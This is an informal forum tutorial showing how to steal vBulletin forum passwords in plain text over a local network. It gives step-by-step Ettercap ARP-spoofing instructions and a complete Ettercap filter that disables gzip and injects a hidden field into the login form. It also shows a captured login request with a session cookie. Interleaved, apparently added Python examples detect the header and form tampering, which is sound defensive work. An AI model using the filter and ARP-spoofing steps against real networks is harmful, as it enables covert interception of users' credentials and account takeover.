sorry for my totally POOR English :-(

I wrote this mini tutorial because I wanted to play with Ettercap filters.

If you have ever sniffed a username and password from the RE Forum, you will have noticed that the username is sent in clear text but the password is sent as an MD5 hash. The MD5 hash is computed by a JavaScript function. If we look into the source code of the main forum page "http://forums.remote-exploit.org/index.php" we can see that the MD5 JavaScript is located at "http://forums.remote-exploit.org/clientscript/vbulletin_md5.js". Let's look at the first line of the login section of index.php (listed below). 'onsubmit' means that when we press the LOG IN button the 'md5hash' JavaScript function is executed. The value entered in the password field 'vb_login_password' is passed to the JavaScript, the MD5 hash is computed, and it is sent back to the FORM as 'vb_login_md5password' and 'vb_login_md5password_utf'.

How to "hack" this login method? Of course we can sniff the username and MD5 hash and then break the MD5 with a rainbow table. But I think there are a lot of better ways to get the password. I like Ettercap and its packet filters. That's why I 'hacked' the forum using my own Ettercap filter.

OK. The main idea is that the password must be forced to be sent to the web server in plain text. It's obvious that the user shouldn't notice that his/her network is being sniffed, so the login script must be modified in a way that still allows normal logging into the forum. The simplest way to do this is to modify the login section of index.php. As we see below, there are input tags of type='hidden'. These fields are filled in by the md5hash JavaScript and then sent to the server. I think the best solution is just to add a new input field and copy the password string into it. To do this, the existing HTML code must be modified. Let's use ETTERCAP and its filters.

But first we should look at the HTTP traffic generated by the RE Forum during login. Start ETHEREAL. As we see, the HTML source code isn't sent in plain text! It is compressed by gzip (deflate).
To disable this feature we have to remove the entry "Accept-Encoding: gzip,deflate" from the HTTP packets and replace it with something else (I've seen the Ettercap and Yahoo tutorial, that's why I know this ;-). Let's use one of the Ettercap filters to eliminate gzip compression. Now we can sniff the network and we notice that the forum page is sent without gzip compression! Pure HTML code! So let's modify something. I suggest replacing a useless part of line 14 with something useful, like a new input tag ;-)
I added ONFOCUS to the login button section because I wanted to assign "vb_login_password.value" to x.value of the new input tag, so that x is sent to the server in plain text.

onfocus="x.value =vb_login_password.value" /><input type="hidden" name="x" />

Now we have a new, seemingly useless parameter 'x' which is sent in plain text to the server's 'login.php'. The server ignores it, but we don't, because this is our desired password!
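From the other side of the wire, both halves of the trick described above leave marks in the login request itself: the Accept-Encoding header is either renamed to a name no browser sends or whited out to spaces and commas, and the POST to login.php carries a field the genuine form never contained. The following is an added example (not part of the original post, and not vBulletin or Ettercap code) of a small server-side or IDS-style check that looks for exactly those marks. The allow-list of browser headers, the host name forums.example.test and the sample requests are constructed for the example; the hash-looking values are placeholders.

```python
import re
from urllib.parse import parse_qs

# Form fields the genuine vBulletin login form (listed further down the post)
# actually submits. Anything else in a login POST was not put there by the form.
EXPECTED_LOGIN_FIELDS = {
    "vb_login_username", "vb_login_password", "cookieuser", "s", "do",
    "vb_login_md5password", "vb_login_md5password_utf",
}

# Request headers we expect from a browser. This allow-list is an assumption
# of the example; extend it for the clients you actually see.
KNOWN_HEADERS = {
    "host", "user-agent", "accept", "accept-language", "accept-encoding",
    "accept-charset", "keep-alive", "connection", "referer", "cookie",
    "content-type", "content-length",
}


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request line, {header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_login_request(raw):
    """Return a list of findings; an empty list means nothing looked tampered."""
    request_line, headers, body = parse_request(raw)
    findings = []

    # 1. Header tampering: a header name no browser sends, or an
    #    Accept-Encoding whose value has been whited out to spaces and commas.
    for name in headers:
        if name not in KNOWN_HEADERS:
            findings.append(f"unknown-header:{name}")
    enc = headers.get("accept-encoding")
    if enc is not None and not re.search(r"[A-Za-z]", enc):
        findings.append("accept-encoding-blanked")

    # 2. Injected form fields on the login POST.
    if request_line.startswith("POST /login.php"):
        fields = parse_qs(body, keep_blank_values=True)
        for name in fields:
            if name not in EXPECTED_LOGIN_FIELDS:
                findings.append(f"unexpected-form-field:{name}")
        # In the genuine flow the browser submits vb_login_password empty
        # (the capture later in the post shows this), so a non-empty value
        # here means the form's hashing path was bypassed or altered.
        if fields.get("vb_login_password", [""])[0]:
            findings.append("plaintext-password-field-not-blanked")
    return findings


# Constructed samples (not a real capture). Hash-looking values are placeholders.
_BODY_GENUINE = (
    "vb_login_username=alice&vb_login_password=&s=&do=login"
    "&vb_login_md5password=00000000000000000000000000000000"
    "&vb_login_md5password_utf=00000000000000000000000000000000"
)
GENUINE_REQUEST = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: forums.example.test\r\n"
    "Accept-Encoding: gzip,deflate\r\n"
    "Referer: http://forums.example.test/index.php\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n" + _BODY_GENUINE
)
# The same login after a filter like the one in this post has run: "gzip" and
# "deflate" whited out, the header renamed, and an injected field x present.
TAMPERED_REQUEST = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: forums.example.test\r\n"
    "Accept-Rubbish!:     ,       \r\n"
    "Referer: http://forums.example.test/index.php\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n" + _BODY_GENUINE.replace("&s=", "&x=hunter2&s=")
)

if __name__ == "__main__":
    print("genuine :", inspect_login_request(GENUINE_REQUEST))
    print("tampered:", inspect_login_request(TAMPERED_REQUEST))
```

The check is deliberately allow-list based: it does not look for the string "Accept-Rubbish!" in particular, because the filter author can pick any 15-character name, but any unknown header name or any unexpected form field on the login POST is enough to raise an alert.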

To start sniffing, the Ettercap filter must be compiled.
1. create a new empty file ForumFilter.filter
2. copy and paste the Ettercap filter included below into the file
3. compile it: 'etterfilter ForumFilter.filter -o ForumFilter'

Next, start Ettercap:
1. Sniff -> Unified Sniffing
2. Hosts -> Scan for Hosts
3. Hosts -> Host List, and add the victim's machine to target 1 and the router etc. to target 2
4. MITM -> ARP Spoofing, Sniff Remote Connections
5. Filters -> Load a filter..., then open our ForumFilter
6. Start -> Start sniffing

Next, start ETHEREAL.
The network is now being sniffed.
If everything is done correctly, the username and password should appear in plain text in the sniffer.

This is the screenshot from ETHEREAL:
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://forums.remote-exploit.org/index.php
Cookie: bbsessionhash=5613a271e92e68758bede781f8795775; bblastvisit=1157060031; bblastactivity=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 183

vb_login_username=eXterminator&vb_login_password=&x=#######&s=&do=login&vb_login_md5password=10219952f5b55f33 4be8e24b6ce0ed6f&vb_login_md5password_utf=10216952 f5b87d8b88e24b6ab0ed6f
HTTP/1.0 200 OK

Line 14 after modification:
<td><input type="submit" class="button" value="Log in" tabindex="104" title="Enter your username and password in the boxes provided to login, or c" onfocus="x.value =vb_login_password.value" /><input type="hidden" name="x" /></td>


This is the login form from index.php:
<!-- login form -->
1 <form action="login.php" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
2 <script type="text/javascript" src="clientscript/vbulletin_md5.js"></script>
3 <table cellpadding="0" cellspacing="3" border="0">
4
5 <tr>
6 <td class="smallfont">User Name</td>
7 <td><input type="text" class="bginput" style="font-size: 11px" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" onfocus="if (this.value == 'User Name') this.value = '';" /></td>
8 <td class="smallfont" colspan="2" nowrap="nowrap"><label for="cb_cookieuser_navbar"><input type="checkbox" name="cookieuser" value="1" tabindex="103" id="cb_cookieuser_navbar" accesskey="c" />Remember Me?</label></td>
9 </tr>
10 <tr>
11 <td class="smallfont">Password</td>
12
13 <td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" size="10" accesskey="p" tabindex="102" /></td>
14 <td><input type="submit" class="button" value="Log in" tabindex="104" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile for yourself." accesskey="s" /></td>
15 </tr>
16 </table>
17 <input type="hidden" name="s" value="" />
18 <input type="hidden" name="do" value="login" />
19 <input type="hidden" name="vb_login_md5password" />
20 <input type="hidden" name="vb_login_md5password_utf" />
21 </form>

<!-- / login form -->
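The listing above is also the baseline a site owner can check served pages against: the genuine form has a fixed set of input names, its only inline script is the onfocus on the username box, and the submit button carries no script at all. The following is an added example (not part of the original post, and not vBulletin code) that parses a login form with Python's html.parser and reports any input or inline handler that is not in that baseline. GENUINE_FORM is a trimmed copy of the form above, and ALTERED_FORM is the same form after the line 14 replacement described in this post; both are constructed here for the example.

```python
from html.parser import HTMLParser

# Input names the genuine form contains; the submit button has no name.
EXPECTED_INPUTS = {
    "vb_login_username", "cookieuser", "vb_login_password",
    "s", "do", "vb_login_md5password", "vb_login_md5password_utf",
}
# Inline event handlers the genuine form uses, per input name.
EXPECTED_HANDLERS = {"vb_login_username": {"onfocus"}}


class LoginFormAudit(HTMLParser):
    """Collect every <input> with its name, type and inline on* attributes."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        handlers = {k for k in a if k.startswith("on")}
        self.inputs.append((a.get("name"), a.get("type", "text"), handlers))


def audit_login_form(html):
    """Return findings for a served login form; [] means it matches the baseline."""
    parser = LoginFormAudit()
    parser.feed(html)
    findings = []
    for name, itype, handlers in parser.inputs:
        if itype == "submit":
            # The genuine submit button carries no script at all.
            for h in sorted(handlers):
                findings.append(f"handler-on-submit:{h}")
            continue
        if name not in EXPECTED_INPUTS:
            findings.append(f"unexpected-input:{name}")
            continue
        for h in sorted(handlers - EXPECTED_HANDLERS.get(name, set())):
            findings.append(f"unexpected-handler:{name}:{h}")
    return findings


# Trimmed copy of the genuine form listed in the post (constructed sample).
GENUINE_FORM = """<form action="login.php" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<input type="text" class="bginput" name="vb_login_username" id="navbar_username" value="User Name" onfocus="if (this.value == 'User Name') this.value = '';" />
<input type="checkbox" name="cookieuser" value="1" id="cb_cookieuser_navbar" />
<input type="password" class="bginput" name="vb_login_password" />
<input type="submit" class="button" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile for yourself." accesskey="s" />
<input type="hidden" name="s" value="" />
<input type="hidden" name="do" value="login" />
<input type="hidden" name="vb_login_md5password" />
<input type="hidden" name="vb_login_md5password_utf" />
</form>"""

# The same form after the line 14 replacement described in the post.
ALTERED_FORM = GENUINE_FORM.replace(
    """lick the 'register' button to create a profile for yourself." accesskey="s" />""",
    '" onfocus="x.value =vb_login_password.value" /><input type="hidden" name="x" />',
)

if __name__ == "__main__":
    print("genuine:", audit_login_form(GENUINE_FORM))
    print("altered:", audit_login_form(ALTERED_FORM))
```

Run from a monitoring host that fetches the login page over the same network path as the users, this flags the injected hidden field and the script attached to the submit button; a clean fetch over a path the attacker cannot reach (or over TLS) gives the baseline to compare against.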

MY ETTERCAP FILTER

if (search(DATA.data, "gzip")) {
    replace("gzip", "    "); # note: four spaces, the same length as "gzip"
    msg("whited out gzip\n");
}
if (search(DATA.data, "deflate")) {
    replace("deflate", "       "); # note: seven spaces, the same length as "deflate"
    msg("whited out deflate\n");
}
if (search(DATA.data, "gzip,deflate")) {
    replace("gzip,deflate", "            "); # note: twelve spaces, the same length as "gzip,deflate"
    msg("whited out deflate and gzip\n");
}
if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is the same length as the original string
    msg("zapped Accept-Encoding!\n");
}
if (search(DECODED.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is the same length as the original string
    msg("zapped DECODED Accept-Encoding!\n");
}
if (search(DATA.data, "click the 'register'")) {
    replace("lick the 'register' button to create a profile for yourself.\x22 accesskey=\x22s\x22 />", "\x22 onfocus=\x22x.value =vb_login_password.value\x22 /><input type=\x22hidden\x22 name=\x22x\x22 />");
    msg("REPLACED\n");
}